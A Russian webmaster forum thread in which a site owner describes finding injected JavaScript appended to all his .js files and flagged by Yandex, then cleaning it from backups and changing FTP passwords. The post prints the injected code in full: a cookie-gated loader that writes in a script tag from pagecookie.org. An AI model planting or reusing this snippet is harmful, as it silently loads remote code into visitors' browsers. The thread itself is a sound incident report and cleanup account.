Вредоносный код на сайте.

ukrop
На сайте с 13.03.2009
83
450

Полезная информация, может кому пригодится! На днях зашел в яндекс вебмастер, увидел, что несколько моих сайтов с пометкой

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.

Начал искать этот код, ни один сервис "онлайн проверки на вирусы" мне не помог, все утверждали, что все в порядке! Написал Платону, довольно быстро получил ответ с подсказкой куда копать!

вот этот код

function g(){var r=new RegExp("(?:; )?1=([^;]*);?");return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000)); 

if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<script src="http://pagecookie.org/pagecookie.js"></script>');}

Оказалось, что в конце каждого .JS файла он каким то образом прописался.... таких файлов сотни или даже тысячи! Скрипт, чтобы удалить код на сервере искать не стал. На днях делал бекапы всех сайтов, проверил выборочно код присутствовал.

Причем есть пару сайтов на народе и там тоже этот код прописался.

Выручила простая и очень удобная програмулина "Словогрыз" с ее помощью удалил этот код сразу на всех файлах. Настроил ее только на .js файлы добавил директорию на локале, где лежали все бекапы и вуаля! готово!

Далее перезалил файлы обратно на сервер и поменял фтп пароли. Теперь буду смотреть если опять пропишется эта бяка, будем думать дальше.

Написанному верить!
AB
На сайте с 18.12.2012
0
ukrop:
Полезная информация, может кому пригодится! На днях зашел в яндекс вебмастер, увидел, что несколько моих сайтов с пометкой

Мы такое уже проходили.

Не шартесь по Интерентам с открытыми FTP соединениями или залогиненой учеткой на укозе.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий